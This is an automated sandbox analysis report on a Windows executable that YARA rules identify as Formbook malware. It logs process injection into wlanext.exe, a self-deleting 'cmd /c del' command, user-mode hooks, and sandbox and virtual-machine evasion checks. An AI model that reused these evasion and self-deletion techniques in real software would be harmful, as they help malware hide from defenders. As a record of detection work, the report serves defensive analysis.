Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Code function: 1_2_0322E5F0	1_2_0322E5F0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_0041E004	10_2_0041E004
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_00401027	10_2_00401027
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_00401030	10_2_00401030
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_0041D0C1	10_2_0041D0C1
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_0041D3B9	10_2_0041D3B9
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_00402D87	10_2_00402D87
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_00402D90	10_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_00409E40	10_2_00409E40
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_00402FB0	10_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D2581	10_2_019D2581
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019BD5E0	10_2_019BD5E0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019AF900	10_2_019AF900
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A0D20	10_2_019A0D20
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019C4120	10_2_019C4120
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A71D55	10_2_01A71D55
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019BB090	10_2_019BB090
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D20A0	10_2_019D20A0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B841F	10_2_019B841F
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A61002	10_2_01A61002
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019DEBB0	10_2_019DEBB0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019C6E30	10_2_019C6E30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F2E004	20_2_02F2E004
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F19E40	20_2_02F19E40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F12FB0	20_2_02F12FB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F12D90	20_2_02F12D90
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F12D87	20_2_02F12D87

Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe

Code function: String function: 019AB150 appears 35 times

Source: 9thuIDnsFV.exe

Static PE information: invalid certificate

Source: 9thuIDnsFV.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9thuIDnsFV.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9thuIDnsFV.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9thuIDnsFV.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 9thuIDnsFV.exe	Binary or memory string: OriginalFilename vs 9thuIDnsFV.exe
Source: 9thuIDnsFV.exe, 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAucrorbejpjpqs.dll> vs 9thuIDnsFV.exe
Source: 9thuIDnsFV.exe, 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameElcbrjrgopuwq.dll" vs 9thuIDnsFV.exe
Source: 9thuIDnsFV.exe, 00000001.00000002.421855584.0000000000E82000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameAAXZConsoleApp9.exeB vs 9thuIDnsFV.exe
Source: 9thuIDnsFV.exe, 00000001.00000002.428503196.0000000006320000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs 9thuIDnsFV.exe
Source: 9thuIDnsFV.exe	Binary or memory string: OriginalFilename vs 9thuIDnsFV.exe
Source: 9thuIDnsFV.exe, 0000000A.00000000.421133231.0000000000F42000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameAAXZConsoleApp9.exeB vs 9thuIDnsFV.exe
Source: 9thuIDnsFV.exe, 0000000A.00000002.498789895.0000000001DC2000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamewlanext.exej% vs 9thuIDnsFV.exe
Source: 9thuIDnsFV.exe, 0000000A.00000002.498552872.0000000001C2F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 9thuIDnsFV.exe
Source: 9thuIDnsFV.exe	Binary or memory string: OriginalFilenameAAXZConsoleApp9.exeB vs 9thuIDnsFV.exe

Source: 9thuIDnsFV.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 10.2.9thuIDnsFV.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.9thuIDnsFV.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.9thuIDnsFV.exe.45b0350.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.9thuIDnsFV.exe.45b0350.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.9thuIDnsFV.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.9thuIDnsFV.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.9thuIDnsFV.exe.45140c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.9thuIDnsFV.exe.45140c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: 9thuIDnsFV.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 9thuIDnsFV.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/3@1/1

Source: C:\Users\user\Desktop\9thuIDnsFV.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9thuIDnsFV.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3860:120:WilError_01

Source: C:\Users\user\Desktop\9thuIDnsFV.exe

File created: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe

Jump to behavior

Source: 9thuIDnsFV.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\9thuIDnsFV.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\9thuIDnsFV.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: 9thuIDnsFV.exe	Virustotal: Detection: 38%
Source: 9thuIDnsFV.exe	ReversingLabs: Detection: 23%

Source: C:\Users\user\Desktop\9thuIDnsFV.exe

File read: C:\Users\user\Desktop\9thuIDnsFV.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\9thuIDnsFV.exe 'C:\Users\user\Desktop\9thuIDnsFV.exe'
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process created: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe vgyjnbhui
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process created: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe vgyjnbhui	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\9thuIDnsFV.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 9thuIDnsFV.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 9thuIDnsFV.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000E.00000000.455604694.000000000DC20000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: 9thuIDnsFV.exe, 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdb source: 9thuIDnsFV.exe, 0000000A.00000002.498749026.0000000001DB0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: 9thuIDnsFV.exe, 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdbGCTL source: 9thuIDnsFV.exe, 0000000A.00000002.498749026.0000000001DB0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000E.00000000.455604694.000000000DC20000.00000002.00000001.sdmp

Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_004168E0 push eax; iretd	10_2_004168E1
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_00416907 push ds; retf	10_2_00416908
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_004093D6 push es; retf	10_2_004093DD
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_00416CB4 pushfd ; retf	10_2_00416CBC
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_004176ED push ebx; iretd	10_2_004176EF
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_0041CEB5 push eax; ret	10_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_0041CF6C push eax; ret	10_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_0041CF02 push eax; ret	10_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_0041CF0B push eax; ret	10_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019FD0D1 push ecx; ret	10_2_019FD0E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F193D6 push es; retf	20_2_02F193DD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F268E0 push eax; iretd	20_2_02F268E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F26907 push ds; retf	20_2_02F26908
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F276ED push ebx; iretd	20_2_02F276EF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F2CEB5 push eax; ret	20_2_02F2CF08
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F2CF6C push eax; ret	20_2_02F2CF72
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F2CF02 push eax; ret	20_2_02F2CF08
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F2CF0B push eax; ret	20_2_02F2CF72
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 20_2_02F26CB4 pushfd ; retf	20_2_02F26CBC

Source: C:\Users\user\Desktop\9thuIDnsFV.exe

File created: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xEB

Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: 9thuIDnsFV.exe, 00000001.00000002.424675274.00000000033B6000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 0000000002F198E4 second address: 0000000002F198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 0000000002F19B5E second address: 0000000002F19B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe

Code function: 10_2_00409A90 rdtsc

10_2_00409A90

Source: C:\Users\user\Desktop\9thuIDnsFV.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\9thuIDnsFV.exe

Window / User API: threadDelayed 1778

Jump to behavior

Source: C:\Users\user\Desktop\9thuIDnsFV.exe TID: 6368

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\explorer.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\9thuIDnsFV.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: explorer.exe, 0000000E.00000000.452463166.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000E.00000000.452393982.00000000083E9000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: 9thuIDnsFV.exe	Binary or memory string: 3V97MjDwzNY10/CE3FdlPTc3QDRJmTHAfugGZ6zy6kRSVp+JZqpfk8Ffo9rd0+zrd2KPwKN3IwbD9bQLswwzDhyn4PdAUcVsBK5n\77208IwpEVv/3DMWkIIYr+GO0CgNtkcu/AzuJ1M8gweiCBUod5UYqcxkP0QAKl0hwizDJ5b4pZws5eikxSjRN4UuQgGFVmciINBjSJ\7NLLQdzKojxbpxogKKZWM8B1Zm8STIrPk9ANQxogWqeZZSr2a6ZmW+yC
Source: 9thuIDnsFV.exe, 00000001.00000002.424675274.00000000033B6000.00000004.00000001.sdmp	Binary or memory string: 0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: explorer.exe, 0000000E.00000000.445336091.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000000E.00000000.447425630.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 9thuIDnsFV.exe, 00000001.00000002.424675274.00000000033B6000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 0000000E.00000000.452393982.00000000083E9000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000E.00000000.447425630.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 9thuIDnsFV.exe	Binary or memory string: drNC7TIZTDW2xdJg6023IiTjmTuQlBYEtkPt+T/Us4SLdWi2qlCcddJ8V\7R0tAT+wpPaK51PoqE0nSbQ8X0gIV1QeMUdu7fBCInEO6ADyk+Y6Pj50bA89PiZBRwnUO9K3Ns0/btgvn5n7ypGhhTP0mZCoNxZCnK\7nl3WEoY5NqGqiGi1R8cYbO9DuvgNpNPQlR0tOwm091GcDraPdworFfl+/7zsOq5SWDlDvKmIEUiEy8m9CKUXDLxi9/PJynX1DX
Source: explorer.exe, 0000000E.00000000.452004662.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: 9thuIDnsFV.exe, 00000001.00000002.424675274.00000000033B6000.00000004.00000001.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: explorer.exe, 0000000E.00000000.445336091.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
